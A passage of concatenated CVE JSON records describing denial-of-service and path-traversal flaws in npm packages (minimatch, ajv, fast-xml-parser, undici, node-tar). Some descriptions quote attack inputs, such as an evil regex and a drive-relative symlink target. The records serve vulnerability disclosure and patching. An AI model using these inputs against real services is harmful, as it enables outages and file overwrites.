            "other": {
              "content": {
                "id": "CVE-2026-27903",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-26T19:20:40.009551Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-26T19:20:51.517Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "minimatch",
          "vendor": "isaacs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 10.0.0, \u003c 10.2.3"
            },
            {
              "status": "affected",
              "version": "\u003e= 9.0.0, \u003c 9.0.7"
            },
            {
              "status": "affected",
              "version": "\u003e= 8.0.0, \u003c 8.0.6"
            },
            {
              "status": "affected",
              "version": "\u003e= 7.0.0, \u003c 7.4.8"
            },
            {
              "status": "affected",
              "version": "\u003e= 6.0.0, \u003c 6.2.2"
            },
            {
              "status": "affected",
              "version": "\u003e= 5.0.0, \u003c 5.1.8"
            },
            {
              "status": "affected",
              "version": "\u003e= 4.0.0, \u003c 4.2.5"
            },
            {
              "status": "affected",
              "version": "\u003c 3.1.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, `matchOne()` performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent `**` (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where `n` is the number of path segments and `k` is the number of globstars. With k=11 and n=30, a call to the default `minimatch()` API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior. Any application where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3 fix the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-407",
              "description": "CWE-407: Inefficient Algorithmic Complexity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-26T01:06:32.856Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj"
        }
      ],
      "source": {
        "advisory": "GHSA-7r86-cg39-jmmj",
        "discovery": "UNKNOWN"
      },
      "title": "minimatch has a ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-27903",
    "datePublished": "2026-02-26T01:06:32.856Z",
    "dateReserved": "2026-02-24T15:19:29.718Z",
    "dateUpdated": "2026-02-26T19:20:51.517Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 7.5,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2025-69873",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-12T15:13:03.482882Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-400",
                "description": "CWE-400 Uncontrolled Resource Consumption",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-03T17:25:31.651Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "ajv",
          "vendor": "ajv.js",
          "versions": [
            {
              "lessThan": "6.14.0",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThan": "8.17.2",
              "status": "affected",
              "version": "7.0.0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:a:ajv.js:ajv:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.14.0",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:a:ajv.js:ajv:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "8.17.2",
                  "versionStartIncluding": "7.0.0",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "ajv (Another JSON Schema Validator) before 8.18.0 is vulnerable to Regular Expression Denial of Service (ReDoS) when the $data option is enabled. The pattern keyword accepts runtime data via JSON Pointer syntax ($data reference), which is passed directly to the JavaScript RegExp() constructor without validation. An attacker can inject a malicious regex pattern (e.g., \"^(a|a)*$\") combined with crafted input to cause catastrophic backtracking. A 31-character payload causes approximately 44 seconds of CPU blocking, with each additional character doubling execution time. This enables complete denial of service with a single HTTP request against any API using ajv with $data: true for dynamic schema validation. This issue is also fixed in version 6.14.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 2.9,
            "baseSeverity": "LOW",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-1333",
              "description": "CWE-1333 Inefficient Regular Expression Complexity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-02T20:22:25.698Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://github.com/advisories/GHSA-2g4f-4pwh-qvx6"
        },
        {
          "url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"
        },
        {
          "url": "https://github.com/github/advisory-database/pull/6991"
        },
        {
          "url": "https://github.com/ajv-validator/ajv/pull/2588"
        },
        {
          "url": "https://github.com/ajv-validator/ajv/releases/tag/v6.14.0"
        },
        {
          "url": "https://github.com/ajv-validator/ajv/pull/2590"
        }
      ],
      "x_generator": {
        "engine": "enrichogram 0.0.1"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2025-69873",
    "datePublished": "2026-02-11T00:00:00.000Z",
    "dateReserved": "2026-01-09T00:00:00.000Z",
    "dateUpdated": "2026-03-03T17:25:31.651Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-27942",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-26T15:48:57.198872Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-26T15:49:35.449Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "fast-xml-parser",
          "vendor": "NaturalIntelligence",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 5.3.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. Prior to version 5.3.8, the application crashes with stack overflow when user use XML builder with `preserveOrder:true`. Version 5.3.8 fixes the issue. As a workaround, use XML builder with `preserveOrder:false` or check the input data before passing to builder."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 2.7,
            "baseSeverity": "LOW",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U",
            "version": "4.0",
            "vulnAvailabilityImpact": "LOW",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-120",
              "description": "CWE-120: Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-26T01:22:11.383Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3"
        },
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791"
        },
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a"
        }
      ],
      "source": {
        "advisory": "GHSA-fj3w-jwp8-x2g3",
        "discovery": "UNKNOWN"
      },
      "title": "fast-xml-parser has stack overflow in XMLBuilder with preserveOrder"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-27942",
    "datePublished": "2026-02-26T01:22:11.383Z",
    "dateReserved": "2026-02-25T03:11:36.689Z",
    "dateUpdated": "2026-02-26T15:49:35.449Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-2229",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-13T13:06:30.575811Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-13T13:06:46.814Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://github.com/nodejs/undici/",
          "defaultStatus": "unaffected",
          "packageName": "undici",
          "product": "undici",
          "repo": "https://github.com/nodejs/undici/",
          "vendor": "undici",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 6.24.0; 7.0.0 \u003c 7.24.0"
            },
            {
              "status": "unaffected",
              "version": "6.24.0: 7.24.0"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "Matteo Collina"
        },
        {
          "lang": "en",
          "type": "remediation reviewer",
          "value": "Ulises Gasc\u00f3n"
        },
        {
          "lang": "en",
          "type": "remediation reviewer",
          "value": "Rafael Gonzaga"
        },
        {
          "lang": "en",
          "type": "remediation reviewer",
          "value": "Ethan Arrowood"
        },
        {
          "lang": "en",
          "type": "reporter",
          "value": "Aisle Research"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003ch3\u003e\u003cspan\u003eImpact\u003c/span\u003e\u003c/h3\u003e\u003cp\u003eThe undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the\u0026nbsp;\u003ccode\u003eserver_max_window_bits\u003c/code\u003e\u0026nbsp;parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range\u0026nbsp;\u003ccode\u003eserver_max_window_bits\u003c/code\u003e\u0026nbsp;value (outside zlib\u0027s valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.\u003c/p\u003e\u003cp\u003eThe vulnerability exists because:\u003c/p\u003e\u003col\u003e\u003cli\u003eThe\u0026nbsp;\u003ccode\u003eisValidClientWindowBits()\u003c/code\u003e\u0026nbsp;function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15\u003c/li\u003e\u003cli\u003eThe\u0026nbsp;\u003ccode\u003ecreateInflateRaw()\u003c/code\u003e\u0026nbsp;call is not wrapped in a try-catch block\u003c/li\u003e\u003cli\u003eThe resulting exception propagates up through the call stack and crashes the Node.js process\u003c/li\u003e\u003c/ol\u003e\u003cbr\u003e"
            }
          ],
          "value": "ImpactThe undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the\u00a0server_max_window_bits\u00a0parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range\u00a0server_max_window_bits\u00a0value (outside zlib\u0027s valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.\n\nThe vulnerability exists because:\n\n  *  The\u00a0isValidClientWindowBits()\u00a0function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15\n  *  The\u00a0createInflateRaw()\u00a0call is not wrapped in a try-catch block\n  *  The resulting exception propagates up through the call stack and crashes the Node.js process"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-248",
              "description": "CWE-248 Uncaught exception",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-1284",
              "description": "CWE-1284 Improper validation of specified quantity in input",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-12T20:27:05.600Z",
        "orgId": "ce714d77-add3-4f53-aff5-83d477b104bb",
        "shortName": "openjs"
      },
      "references": [
        {
          "url": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8"
        },
        {
          "url": "https://hackerone.com/reports/3487486"
        },
        {
          "url": "https://cna.openjsf.org/security-advisories.html"
        },
        {
          "url": "https://datatracker.ietf.org/doc/html/rfc7692"
        },
        {
          "url": "https://nodejs.org/api/zlib.html#class-zlibinflateraw"
        }
      ],
      "source": {
        "advisory": "GHSA-v9p9-hfj2-hcw8",
        "discovery": "UNKNOWN"
      },
      "title": "undici is vulnerable to Unhandled Exception in undici WebSocket Client Due to Invalid server_max_window_bits Validation",
      "x_generator": {
        "engine": "Vulnogram 1.0.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "ce714d77-add3-4f53-aff5-83d477b104bb",
    "assignerShortName": "openjs",
    "cveId": "CVE-2026-2229",
    "datePublished": "2026-03-12T20:27:05.600Z",
    "dateReserved": "2026-02-08T17:51:16.985Z",
    "dateUpdated": "2026-03-13T13:06:46.814Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-31802",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-10T14:56:31.266727Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-10T14:56:35.229Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "node-tar",
          "vendor": "isaacs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 7.5.11"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "node-tar is a full-featured Tar for Node.js. Prior to version 7.5.11, tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction. This vulnerability is fixed in 7.5.11."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-09T21:11:56.668Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-9ppj-qmqm-q256"
        },
        {
          "name": "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad"
        }
      ],
      "source": {
        "advisory": "GHSA-9ppj-qmqm-q256",
        "discovery": "UNKNOWN"
      },
      "title": "node-tar Symlink Path Traversal via Drive-Relative Linkpath"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-31802",
    "datePublished": "2026-03-09T21:11:56.668Z",
    "dateReserved": "2026-03-09T16:33:42.913Z",
    "dateUpdated": "2026-03-10T14:56:35.229Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33036",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-25T13:57:14.886976Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-25T13:57:58.233Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "fast-xml-parser",
          "vendor": "NaturalIntelligence",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 4.0.0-beta.3, \u003c 5.5.6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Versions 4.0.0-beta.3 through 5.5.5 contain a bypass vulnerability where numeric character references (\u0026#NNN;, \u0026#xHH;) and standard XML entities completely evade the entity expansion limits (e.g., maxTotalExpansions, maxExpandedLength) added to fix CVE-2026-26278, enabling XML entity expansion Denial of Service. The root cause is that replaceEntitiesValue() in OrderedObjParser.js only enforces expansion counting on DOCTYPE-defined entities while the lastEntities loop handling numeric/standard entities performs no counting at all. An attacker supplying 1M numeric entity references like \u0026#65; can force ~147MB of memory allocation and heavy CPU usage, potentially crashing the process\u2014even when developers have configured strict limits. This issue has been fixed in version 5.5.6."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-776",
              "description": "CWE-776: Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-20T05:17:03.290Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r"
        },
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01"
        },
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.6",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.6"
        }
      ],
      "source": {
        "advisory": "GHSA-8gc5-j5rx-235r",
        "discovery": "UNKNOWN"
      },
      "title": "fast-xml-parser affected by numeric entity expansion bypassing all entity expansion limits (incomplete fix for CVE-2026-26278)"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33036",
    "datePublished": "2026-03-20T05:17:03.290Z",
    "dateReserved": "2026-03-17T18:10:50.210Z",
    "dateUpdated": "2026-03-25T13:57:58.233Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-24842",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-01-28T14:55:08.552380Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-01-28T14:56:10.317Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "node-tar",
          "vendor": "isaacs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 7.5.7"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to craft a malicious TAR archive that bypasses path traversal protections and creates hardlinks to arbitrary files outside the extraction directory. Version 7.5.7 contains a fix for the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-59",
              "description": "CWE-59: Improper Link Resolution Before File Access (\u0027Link Following\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-28T00:20:13.261Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-34x7-hfp2-rc4v"
        },
        {
          "name": "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/isaacs/node-tar/commit/f4a7aa9bc3d717c987fdf1480ff7a64e87ffdb46"
        }
      ],
      "source": {
        "advisory": "GHSA-34x7-hfp2-rc4v",
        "discovery": "UNKNOWN"
      },
      "title": "node-tar Vulnerable to Arbitrary File Creation/Overwrite via Hardlink Path Traversal"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-24842",
    "datePublished": "2026-01-28T00:20:13.261Z",
    "dateReserved": "2026-01-27T14:51:03.059Z",
    "dateUpdated": "2026-01-28T14:56:10.317Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-1525",
                "options": [
                  {
